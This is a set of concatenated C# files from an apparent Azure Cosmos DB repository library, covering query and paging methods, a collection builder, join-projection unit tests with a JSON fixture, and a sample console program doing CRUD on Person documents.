            var response = await query.ExecuteNextAsync<TResult>().ConfigureAwait(true);
            results.AddRange(response);
        }

        return results;
    }

    /// <summary>Paged flattening projection; pageSize 0 means "no limit".</summary>
    public async Task<CosmosDbRepositoryPagedResults<TResult>> SelectManyAsync<TResult>(int pageSize, string continuationToken, Expression<Func<T, IEnumerable<TResult>>> selector, Func<IQueryable<T>, IQueryable<T>> whereClauses = null, Func<IQueryable<TResult>, IQueryable<TResult>> selectClauses = null, FeedOptions feedOptions = null)
    {
        feedOptions = (feedOptions ?? _defaultFeedOptions).ShallowCopy();
        feedOptions.RequestContinuation = continuationToken;
        feedOptions.MaxItemCount = pageSize == 0 ? 10000 : pageSize;

        var query =
            _client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions)
                .ConditionalApplyClauses(whereClauses)
                .SelectMany(selector)
                .ConditionalApplyClauses(selectClauses)
                .AsDocumentQuery();

        var result = new CosmosDbRepositoryPagedResults<TResult>();

        while (query.HasMoreResults)
        {
            var response = await query.ExecuteNextAsync<TResult>().ConfigureAwait(true);
            result.Items.AddRange(response);

            if (pageSize > 0 && result.Items.Count >= pageSize)
            {
                result.ContinuationToken = response.ResponseContinuation;
                break;
            }
        }

        return result;
    }

    /// <summary>Counts documents matching the optional predicate and clauses.</summary>
    public async Task<int> CountAsync(Expression<Func<T, bool>> predicate = null, Func<IQueryable<T>, IQueryable<T>> clauses = null, FeedOptions feedOptions = null)
    {
        return await _client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions ?? _defaultFeedOptions)
            .ConditionalWhere(predicate)
            .ConditionalApplyClauses(clauses)
            .CountAsync();
    }

    /// <summary>Returns the first matching document, or default(T) when none match.</summary>
    public async Task<T> FindFirstOrDefaultAsync(Expression<Func<T, bool>> predicate = null, Func<IQueryable<T>, IQueryable<T>> clauses = null, FeedOptions feedOptions = null)
    {
        feedOptions = (feedOptions ?? _defaultFeedOptions).ShallowCopy();
        feedOptions.MaxItemCount = 1;

        var query =
            _client.CreateDocumentQuery<T>((await _collection).SelfLink, feedOptions)
                .ConditionalWhere(predicate)
                .ConditionalApplyClauses(clauses)
                .AsDocumentQuery();

        T result = default(T);

        if (query.HasMoreResults)
        {
            var response = await query.ExecuteNextAsync<T>().ConfigureAwait(true);
            result = response.FirstOrDefault();
        }

        return result;
    }

    /// <summary>
    /// Re-reads the document identified by the entity. The entity's etag (when
    /// present) becomes an If-None-Match condition, so an unmodified document is
    /// returned as the original entity without a payload transfer.
    /// Returns default(T) when the document does not exist.
    /// </summary>
    public async Task<T> GetAsync(T entity, RequestOptions requestOptions = null)
    {
        (string id, string eTag) = GetIdAndETag(entity);
        requestOptions = ApplyAccessCondition(requestOptions, AccessConditionType.IfNoneMatch, eTag);

        var documentLink = $"{(await _collection).AltLink}/docs/{Uri.EscapeUriString(id)}";

        T result;

        try
        {
            var response = await _client.ReadDocumentAsync<T>(documentLink, requestOptions);
            result = (response.StatusCode == HttpStatusCode.NotModified)
                ? entity
                : response.Document;
        }
        catch (DocumentClientException e)
        {
            // Missing documents are reported as default(T); all other failures propagate.
            if (e.StatusCode != HttpStatusCode.NotFound)
                throw;

            result = default(T);
        }

        return result;
    }

    /// <summary>Reads the document by id; returns default(T) when it does not exist.</summary>
    public async Task<T> GetAsync(DocumentId itemId, RequestOptions requestOptions = null)
    {
        var documentLink = $"{(await _collection).AltLink}/docs/{Uri.EscapeUriString(itemId.Id)}";

        T result;

        try
        {
            var response = await _client.ReadDocumentAsync<T>(documentLink, requestOptions);
            result = response.Document;
        }
        catch (DocumentClientException e)
        {
            if (e.StatusCode != HttpStatusCode.NotFound)
                throw;

            result = default(T);
        }

        return result;
    }

    /// <summary>Deletes the document by id; true when the service reports NoContent.</summary>
    public async Task<bool> DeleteDocumentAsync(DocumentId itemId, RequestOptions requestOptions = null)
    {
        var documentLink = $"{(await _collection).AltLink}/docs/{Uri.EscapeUriString(itemId.Id)}";
        var response = await _client.DeleteDocumentAsync(documentLink, requestOptions);
        return response.StatusCode == HttpStatusCode.NoContent;
    }

    /// <summary>
    /// Deletes the document identified by the entity, using its etag (when
    /// present) as an If-Match condition.
    /// </summary>
    public async Task<bool> DeleteDocumentAsync(T entity, RequestOptions requestOptions = null)
    {
        (string id, string eTag) = GetIdAndETag(entity);
        requestOptions = ApplyAccessCondition(requestOptions, AccessConditionType.IfMatch, eTag);

        var documentLink = $"{(await _collection).AltLink}/docs/{Uri.EscapeUriString(id)}";
        var response = await _client.DeleteDocumentAsync(documentLink, requestOptions);
        return response.StatusCode == HttpStatusCode.NoContent;
    }

    /// <summary>
    /// Deletes the whole collection and resets the lazy handle so the next
    /// operation recreates it.
    /// </summary>
    public async Task<bool> DeleteAsync(RequestOptions requestOptions = null)
    {
        var response = await _client.DeleteDocumentCollectionAsync((await _collection).SelfLink, requestOptions);
        _collection = new AsyncLazy<DocumentCollection>(() => GetOrCreateCollectionAsync());
        return response.StatusCode == HttpStatusCode.NoContent;
    }

    /// <summary>Forces creation of the backing collection.</summary>
    public Task Init() => _collection.Value;

    // Typed stored-procedure accessors; one overload per parameter arity.
    public IStoredProcedure<TResult> StoredProcedure<TResult>(string id) => new StoreProcedureImpl<TResult>(_client, this, id);
    public IStoredProcedure<TParam,TResult> StoredProcedure<TParam,TResult>(string id) => new StoreProcedureImpl<TParam,TResult>(_client, this, id);
    public IStoredProcedure<TParam1, TParam2, TResult> StoredProcedure<TParam1, TParam2, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TResult>(_client, this, id);
    public IStoredProcedure<TParam1, TParam2, TParam3, TResult> StoredProcedure<TParam1, TParam2, TParam3,TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TResult>(_client, this, id);
    public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TResult>(_client, this, id);
    public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TResult>(_client, this, id);
    public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TResult>(_client, this, id);
    public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TResult>(_client, this, id);
    public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TResult>(_client, this, id);
    public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TResult>(_client, this, id);
    public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TResult>(_client, this, id);
    public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TResult>(_client, this, id);
    public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TResult>(_client, this, id);
    public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TResult>(_client, this, id);
    public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TResult>(_client, this, id);
    public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TResult>(_client, this, id);
    public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TParam16, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TParam16, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TParam16, TResult>(_client, this, id);

    // Returns request options carrying the given access condition. When eTag is
    // null the caller's instance is returned untouched; otherwise a shallow copy
    // is mutated so a caller-supplied RequestOptions is never modified (bug fix:
    // Replace/Upsert/Get previously assigned AccessCondition onto the caller's
    // object, unlike DeleteDocumentAsync which already copied).
    private static RequestOptions ApplyAccessCondition(RequestOptions requestOptions, AccessConditionType type, string eTag)
    {
        if (eTag == null)
            return requestOptions;

        requestOptions = (requestOptions ?? new RequestOptions()).ShallowCopy();
        requestOptions.AccessCondition = new AccessCondition { Type = type, Condition = eTag };
        return requestOptions;
    }

    // Creates the collection on first use and upserts any stored procedure whose
    // body differs from (or is missing on) the server.
    private async Task<DocumentCollection> GetOrCreateCollectionAsync()
    {
        var resourceResponse = await _client.CreateDocumentCollectionIfNotExistsAsync(
            await _documentDb.SelfLinkAsync,
            new DocumentCollection { Id = Id, IndexingPolicy = _indexingPolicy },
            new RequestOptions { OfferThroughput = _throughput });

        if (_storedProcedures.Any())
        {
            var sps = (await _client.ReadStoredProcedureFeedAsync(resourceResponse.Resource.StoredProceduresLink)).ToArray();

            foreach (var sp in _storedProcedures.Where(sp => sps.FirstOrDefault(p => p.Id == sp.Id)?.Body != sp.Body))
            {
                await _client.UpsertStoredProcedureAsync(resourceResponse.Resource.AltLink, sp);
            }
        }

        return resourceResponse;
    }

    // Extracts the document id and etag from the entity via a cached compiled
    // delegate, using the members whose JSON names are "id" and "_etag".
    private (string id, string eTag) GetIdAndETag(T entity)
    {
        Func<object, (string id, string eTag)> Factory(Type type)
        {
            // Maps each property to its serialized JSON name (JsonProperty wins over the CLR name).
            (string name, PropertyInfo info) GetPropertyJsonName(PropertyInfo pi)
            {
                var jsonProperty = pi.GetCustomAttribute<JsonPropertyAttribute>();
                return (jsonProperty?.PropertyName ?? pi.Name, pi);
            }

            var properties = type.GetProperties().Select(GetPropertyJsonName).ToDictionary(o => o.name, o => o.info);

            // "id" is mandatory; "_etag" is optional (no etag => no access condition).
            var idProperty = properties["id"];
            properties.TryGetValue("_etag", out var eTagProperty);

            var source = Expression.Parameter(typeof(object), "src");
            var typedSource = Expression.Variable(type, "source");

            Expression idValue = Expression.Property(typedSource, idProperty);

            if (idProperty.PropertyType != typeof(string))
            {
                idValue = Expression.Call(idValue, "ToString", new Type[0]);
            }

            Expression eTagValue = eTagProperty == null
                ? Expression.Constant(null, typeof(string))
                : (Expression)Expression.Property(typedSource, eTagProperty);

            if (eTagProperty != default && eTagProperty.PropertyType != typeof(string))
            {
                eTagValue = Expression.Call(eTagValue, "ToString", new Type[0]);
            }

            var newTuple = Expression.New(typeof((string, string)).GetConstructor(new[] { typeof(string), typeof(string) }), idValue, eTagValue);
            var body = Expression.Block(new[] { typedSource }, Expression.Assign(typedSource, Expression.Convert(source, type)), newTuple);
            return Expression.Lambda<Func<object, (string, string)>>(body, source).Compile();
        }

        // Key on the runtime type so derived entity types resolve their own members.
        return _idETagHelper.GetOrAdd(entity.GetType(), Factory)(entity);
    }

    private async Task<String> GetAltLink()
    {
        return (await _collection).AltLink;
    }
}
}<file_sep>using Microsoft.Azure.Documents;
using System;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Linq;
namespace CosmosDbRepository.Implementation
{
/// <summary>
/// Builder for a single document collection: indexing paths, throughput and
/// stored procedures, producing a <see cref="CosmosDbRepository{T}"/>.
/// </summary>
internal class CosmosDbRepositoryBuilder<T>
    : ICosmosDbRepositoryBuilder
{
    private readonly List<IncludedPath> _includedPaths = new List<IncludedPath>();
    private readonly List<ExcludedPath> _excludedPaths = new List<ExcludedPath>();
    private readonly List<StoredProcedure> _sprocs = new List<StoredProcedure>();
    private readonly IndexingMode _indexingMode = IndexingMode.Consistent;
    private int? _throughput;

    public string Id { get; private set; }

    public ICosmosDbRepositoryBuilder WithId(string id)
    {
        Id = id;
        return this;
    }

    public ICosmosDbRepositoryBuilder WithThroughput(int? throughput)
    {
        _throughput = throughput;
        return this;
    }

    public ICosmosDbRepositoryBuilder IncludeIndexPath(string path, params Index[] indexes)
    {
        if (string.IsNullOrWhiteSpace(path))
        {
            throw new ArgumentException("Invalid Include Path", nameof(path));
        }

        // An explicit null (rather than an empty collection) leaves the
        // service's default indexes in effect for this path.
        var indexCollection = (indexes?.Any() ?? false)
            ? new Collection<Index>(indexes)
            : null;

        _includedPaths.Add(new IncludedPath { Path = path, Indexes = indexCollection });
        return this;
    }

    public ICosmosDbRepositoryBuilder ExcludeIndexPath(params string[] paths)
    {
        if (paths == null)
        {
            throw new ArgumentNullException(nameof(paths));
        }

        if (paths.Any(string.IsNullOrWhiteSpace))
        {
            throw new ArgumentException("Invalid Exclude Path", nameof(paths));
        }

        foreach (var path in paths)
        {
            _excludedPaths.Add(new ExcludedPath { Path = path });
        }

        return this;
    }

    public ICosmosDbRepositoryBuilder StoredProcedure(string id, string body)
    {
        _sprocs.Add(new StoredProcedure { Id = id, Body = body });
        return this;
    }

    public ICosmosDbRepository Build(IDocumentClient client, ICosmosDb documentDb, int? defaultThroughput)
    {
        if (string.IsNullOrWhiteSpace(Id))
        {
            throw new InvalidOperationException("Id not specified");
        }

        var indexingPolicy = new IndexingPolicy { IndexingMode = _indexingMode };

        // Only override the policy's path collections when the caller configured any.
        if (_includedPaths.Any())
        {
            indexingPolicy.IncludedPaths = new Collection<IncludedPath>(_includedPaths);
        }

        if (_excludedPaths.Any())
        {
            indexingPolicy.ExcludedPaths = new Collection<ExcludedPath>(_excludedPaths);
        }

        // Collection-specific throughput wins over the database default.
        return new CosmosDbRepository<T>(client, documentDb, Id, indexingPolicy, _throughput ?? defaultThroughput, _sprocs);
    }
}
}
<file_sep>using FluentAssertions;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using Newtonsoft.Json;
using System;
using System.Linq;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.SQL
{
// Exercises SelectManyAsync projections that mirror a SQL JOIN over the nested
// child/grandchild arrays of a single complex document.
[TestClass]
public class CosmosDbRepositoryJoinTests
: CosmosDbRepositoryTests<ComplexTestData<Guid>>
{
// Raw SQL equivalent of the SelectManyAsync lambdas below. Only referenced by the
// commented-out FindAsync<ViewModel> calls; kept for documentation.
// NOTE(review): it queries FROM "TestData" - confirm that matches the collection name used here.
private const string _viewModelQuery =
"SELECT t.id, t.xRefId, t.date, g.dataType, g.dataCategory, g.numericValue " +
"FROM TestData t " +
"JOIN c IN t.childItems " +
"JOIN g IN c.grandchildItems " +
"WHERE c.booleanValue";
// The fixture (_testData) yields exactly 3 projected rows: child[0] passes the
// BooleanValue filter and has 2 grandchildren, child[1] is filtered out,
// child[2] contributes 1, child[3] has no grandchildren.
[TestMethod]
public async Task Find_Expect_Success()
{
using (var context = CreateContext())
{
var data = JsonConvert.DeserializeObject<ComplexTestData<Guid>>(_testData);
data = await context.Repo.UpsertAsync(data);
//var dataList = await context.Repo.FindAsync<ViewModel>(_viewModelQuery);
var dataList = (await context.Repo.SelectManyAsync(
t => t.ChildItems.Where(c => c.BooleanValue).SelectMany(c => c.GrandchildItems.Select(g => new { t.Id, t.XRefId, t.Date, g.DataType, g.DataCategory, g.NumericValue })))).ToArray();
dataList.Should().HaveCount(3);
dataList[0].DataType.Should().Be(data.ChildItems[0].GrandchildItems[0].DataType);
dataList[0].DataCategory.Should().Be(data.ChildItems[0].GrandchildItems[0].DataCategory);
dataList[0].NumericValue.Should().Be(data.ChildItems[0].GrandchildItems[0].NumericValue);
dataList[1].DataType.Should().Be(data.ChildItems[0].GrandchildItems[1].DataType);
dataList[1].DataCategory.Should().Be(data.ChildItems[0].GrandchildItems[1].DataCategory);
dataList[1].NumericValue.Should().Be(data.ChildItems[0].GrandchildItems[1].NumericValue);
dataList[2].DataType.Should().Be(data.ChildItems[2].GrandchildItems[0].DataType);
dataList[2].DataCategory.Should().Be(data.ChildItems[2].GrandchildItems[0].DataCategory);
dataList[2].NumericValue.Should().Be(data.ChildItems[2].GrandchildItems[0].NumericValue);
}
}
// Same projection against an empty collection must return an empty result, not fail.
[TestMethod]
public async Task Find_Expect_Success_WithNoData()
{
using (var context = CreateContext())
{
await context.Repo.DeleteAsync();
// var dataList = await context.Repo.FindAsync<ViewModel>(_viewModelQuery);
var dataList = (await context.Repo.SelectManyAsync(
t => t.ChildItems.Where(c => c.BooleanValue).SelectMany(c => c.GrandchildItems.Select(g => new { t.Id, t.XRefId, t.Date, g.DataType, g.DataCategory, g.NumericValue })))).ToArray();
dataList.Should().BeEmpty();
}
}
// Skip(2).Take(2) over 3 projected rows leaves only the last one.
[TestMethod]
public async Task Find_WithSkipTake_Expect_Success()
{
using (var context = CreateContext())
{
var data = JsonConvert.DeserializeObject<ComplexTestData<Guid>>(_testData);
data = await context.Repo.UpsertAsync(data);
// var dataList = await context.Repo.FindAsync<ViewModel>(_viewModelQuery + " OFFSET 2 LIMIT 2");
var dataList = (await context.Repo.SelectManyAsync(
t => t.ChildItems.Where(c => c.BooleanValue).SelectMany(c => c.GrandchildItems.Select(g => new { t.Id, t.XRefId, t.Date, g.DataType, g.DataCategory, g.NumericValue })),
selectClauses: q => q.Skip(2).Take(2))).ToArray();
dataList.Should().HaveCount(1);
dataList[0].DataType.Should().Be(data.ChildItems[2].GrandchildItems[0].DataType);
dataList[0].DataCategory.Should().Be(data.ChildItems[2].GrandchildItems[0].DataCategory);
dataList[0].NumericValue.Should().Be(data.ChildItems[2].GrandchildItems[0].NumericValue);
}
}
// Page size 1 for the first request, then page size 2 with the continuation token:
// together they must cover all 3 projected rows in order.
[TestMethod]
public async Task Find_WithPageLimit_Expect_Success()
{
using (var context = CreateContext())
{
var data = JsonConvert.DeserializeObject<ComplexTestData<Guid>>(_testData);
data = await context.Repo.UpsertAsync(data);
//var first = await context.Repo.FindAsync<ViewModel>(1, null, _viewModelQuery);
var first = await context.Repo.SelectManyAsync(1, null,
t => t.ChildItems.Where(c => c.BooleanValue).SelectMany(c => c.GrandchildItems.Select(g => new { t.Id, t.XRefId, t.Date, g.DataType, g.DataCategory, g.NumericValue })));
first.Items.Should().HaveCount(1);
first.Items[0].DataType.Should().Be(data.ChildItems[0].GrandchildItems[0].DataType);
first.Items[0].DataCategory.Should().Be(data.ChildItems[0].GrandchildItems[0].DataCategory);
first.Items[0].NumericValue.Should().Be(data.ChildItems[0].GrandchildItems[0].NumericValue);
//var second = await context.Repo.FindAsync<ViewModel>(2, first.ContinuationToken, _viewModelQuery);
var second = await context.Repo.SelectManyAsync(2, first.ContinuationToken,
t => t.ChildItems.Where(c => c.BooleanValue).SelectMany(c => c.GrandchildItems.Select(g => new { t.Id, t.XRefId, t.Date, g.DataType, g.DataCategory, g.NumericValue })));
second.Items.Should().HaveCount(2);
second.Items[0].DataType.Should().Be(data.ChildItems[0].GrandchildItems[1].DataType);
second.Items[0].DataCategory.Should().Be(data.ChildItems[0].GrandchildItems[1].DataCategory);
second.Items[0].NumericValue.Should().Be(data.ChildItems[0].GrandchildItems[1].NumericValue);
second.Items[1].DataType.Should().Be(data.ChildItems[2].GrandchildItems[0].DataType);
second.Items[1].DataCategory.Should().Be(data.ChildItems[2].GrandchildItems[0].DataCategory);
second.Items[1].NumericValue.Should().Be(data.ChildItems[2].GrandchildItems[0].NumericValue);
}
}
// Projection shape for the commented-out FindAsync<ViewModel> variants above;
// unused by the active LINQ-based tests.
public class ViewModel
{
public Guid Id { get; set; }
public string XRefId { get; set; }
public DateTimeOffset Date { get; set; }
public string DataType { get; set; }
public string DataCategory { get; set; }
public float NumericValue { get; set; }
}
// Fixture document: four children (true/false/true/true BooleanValue).
// NOTE(review): some grandchild objects carry trailing commas - Json.NET
// tolerates these, strict JSON parsers would not.
private const string _testData =
@"{
""id"": ""02f1dfe9-38b1-274e-2d8c-154a82b84e49"",
""tag"": ""ComplexTestData"",
""xRefId"": ""6b017a0d-7fb3-4aa7-bd03-b75f1f4ed5b2"",
""date"": ""2019-06-15T04:48:00+00:00"",
""childItems"": [
{
""booleanValue"": true,
""grandchildItems"": [
{
""dataType"": ""Type1"",
""dataCategory"": ""Category1"",
""createdAt"": ""2019-06-16T05:05:00+00:00"",
""numericValue"": 1.11,
},
{
""dataType"": ""Type1"",
""dataCategory"": ""Category2"",
""createdAt"": ""2019-06-16T05:05:00+00:00"",
""numericValue"": 1.12,
}
]
},
{
""booleanValue"": false,
""grandchildItems"": [
{
""dataType"": ""Type1"",
""dataCategory"": ""Category1"",
""createdAt"": ""2019-06-16T05:05:00+00:00"",
""numericValue"": 2.11
}
]
},
{
""booleanValue"": true,
""grandchildItems"": [
{
""dataType"": ""Type2"",
""dataCategory"": ""Category1"",
""createdAt"": ""2019-06-16T05:05:00+00:00"",
""numericValue"": 3.11
}
]
},
{
""booleanValue"": true,
""grandchildItems"": []
}
]
}";
}
}
<file_sep>using Microsoft.Azure.Documents;
using Microsoft.Azure.Documents.Client;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Options;
using System;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.IO;
using System.Linq;
using System.Threading.Tasks;
namespace CosmosDbRepository.Sample
{
/// <summary>
/// End-to-end demo of the CosmosDbRepository API: builds a database/collection with
/// custom indexing and a stored procedure, then walks through CRUD and query calls.
/// </summary>
public class Program
{
private static async Task Main(string[] args)
{
// Configuration comes from appsettings.json, environment variables and user secrets.
var configuration = new ConfigurationBuilder()
.SetBasePath(Directory.GetCurrentDirectory())
.AddJsonFile("appsettings.json", optional: false, reloadOnChange: true)
.AddEnvironmentVariables()
.AddUserSecrets<DocumentClientSettings>()
.Build();
var services = new ServiceCollection()
.Configure<DocumentClientSettings>(configuration.GetSection("DocumentClientSettings"))
.AddOptions()
.BuildServiceProvider();
var clientSettings = services.GetRequiredService<IOptions<DocumentClientSettings>>().Value;
// get the Azure DocumentDB client
var client = new DocumentClient(new Uri(clientSettings.EndpointUrl), clientSettings.AuthorizationKey, clientSettings.ConnectionPolicy);
// Build the "Demo" database with a Person collection: custom include/exclude
// index paths plus a sample stored procedure named "test".
var documentDb = new CosmosDbBuilder()
.WithId("Demo")
.WithDefaultThroughput(400)
.AddCollection<Person>(func: cb =>
{
cb
.IncludeIndexPath("/*", Index.Range(DataType.Number), Index.Hash(DataType.String, 3), Index.Spatial(DataType.Point))
.IncludeIndexPath("/Birthday/?", Index.Range(DataType.Number))
.ExcludeIndexPath("/FirstName/?", "/LastName/?")
.StoredProcedure("test",
@"// SAMPLE STORED PROCEDURE
function sample() {
var collection = getContext().getCollection();
// Query documents and take 1st item.
var isAccepted = collection.queryDocuments(
collection.getSelfLink(),
'SELECT * FROM root r',
function (err, feed, options) {
if (err) throw err;
// Check the feed and if empty, set the body to 'no docs found',
// else take 1st element from feed
if (!feed || !feed.length) {
var response = getContext().getResponse();
response.setBody('no docs found');
}
else {
var response = getContext().getResponse();
response.setBody(feed);
}
});
if (!isAccepted) throw new Error('The query was not accepted by the server.');
}");
})
.Build(client);
// create repository for persons and set Person.FullName property as identity field (overriding default Id property name)
var repo = documentDb.Repository<Person>();
var sp = repo.StoredProcedure<Person[]>("test");
// output all persons in our database, nothing there yet
PrintPersonCollection(await repo.FindAsync());
// create a new person
Person matt = new Person
{
FirstName = "Matt",
LastName = "TBA",
Birthday = new DateTime(1990, 10, 10),
PhoneNumbers =
new Collection<PhoneNumber>
{
new PhoneNumber {Number = "555", Type = "Mobile"},
new PhoneNumber {Number = "777", Type = "Landline"}
}
};
// add person to the database's collection (if the collection doesn't exist it is created and named after the class - a convention that can be configured when the repository is initialized)
matt = await repo.UpsertAsync(matt);
matt = await repo.GetAsync(matt);
var mod = matt.Modified;
var matt2 = await repo.FindAsync(r => r.Modified == mod);
matt = await repo.ReplaceAsync(matt);
await repo.DeleteDocumentAsync(matt);
// create another person
Person jack = new Person
{
FirstName = "Jack",
LastName = "Smith",
Birthday = new DateTime(1990, 10, 10),
PhoneNumbers = new Collection<PhoneNumber>()
};
// add jack to collection
jack = await repo.UpsertAsync(jack);
// list everyone currently stored (matt was deleted above, so expect just jack)
PrintPersonCollection(await repo.FindAsync());
// change birth date
matt.Birthday -= new TimeSpan(500, 0, 0, 0);
// remove landline phone number
matt.PhoneNumbers.RemoveAt(1);
// upsert matt again (he was deleted above, so this re-creates him with the changes)
matt = await repo.UpsertAsync(matt);
// should output Matt with just one phone number
PrintPersonCollection(await repo.FindAsync());
// get Matt by his Id
Person justMatt = await repo.GetAsync(matt.FullName);
Console.WriteLine("GetByIdAsync result: " + justMatt);
// ... or by his first name
Person firstMatt = await repo.FindFirstOrDefaultAsync(p => p.FirstName.ToLower() == "matt");
Console.WriteLine("First: " + firstMatt);
// query all the smiths
var smiths = (await repo.FindAsync(p => p.LastName.Equals("Smith"))).ToList();
Console.WriteLine(smiths.Count);
// use IQueryable, as for now supported expressions are 'Queryable.Where', 'Queryable.Select' & 'Queryable.SelectMany'
var allSmithsPhones =
(await repo.FindAsync()).SelectMany(p => p.PhoneNumbers).Select(p => p.Type);
foreach (var phone in allSmithsPhones)
{
Console.WriteLine(phone);
}
// fetch all persons (result unused; NOTE(review): a count API would be more direct than FindAsync here)
var personsCount = await repo.FindAsync();
// fetch all jacks (result unused; same note as above)
var jacksCount = await repo.FindAsync(p => p.FirstName == "Jack");
PrintPersonCollection(await sp.ExecuteAsync());
Console.ReadKey(true);
// remove matt from collection
await repo.DeleteDocumentAsync(matt.FullName);
// remove jack from collection
await repo.DeleteDocumentAsync(jack.FullName);
// should output nothing
PrintPersonCollection(await repo.FindAsync());
// remove collection
await repo.DeleteAsync();
await documentDb.DeleteAsync();
Console.ReadKey(true);
}
/// <summary>Writes each person to the console, one per line.</summary>
private static void PrintPersonCollection(IEnumerable<Person> people)
{
foreach (var person in people)
{
Console.WriteLine(person);
}
}
}
}
<file_sep>using CosmosDbRepository;
using Microsoft.Azure.Documents.Client;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Options;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.IO;
namespace CosmosDbRepositorySubstituteTest
{
// Assembly-level fixture: builds the shared DI container before any test runs and
// optionally deletes the (randomized) test database afterwards.
[TestClass]
public static class TestFramework
{
// Shared service provider used by every TestingContext in this assembly.
public static ServiceProvider Services;
[AssemblyInitialize]
public static void Initialize(TestContext context)
{
var configuration = new ConfigurationBuilder()
.AddJsonFile(Path.Combine(AppDomain.CurrentDomain.BaseDirectory, "testsettings.json"))
.AddEnvironmentVariables()
.Build();
ServiceCollection services = new ServiceCollection();
services.Configure<CosmosDbConfig>(configuration.GetSection("CosmosDbConfig"));
services.Configure<TestConfig>(configuration.GetSection("TestConfig"));
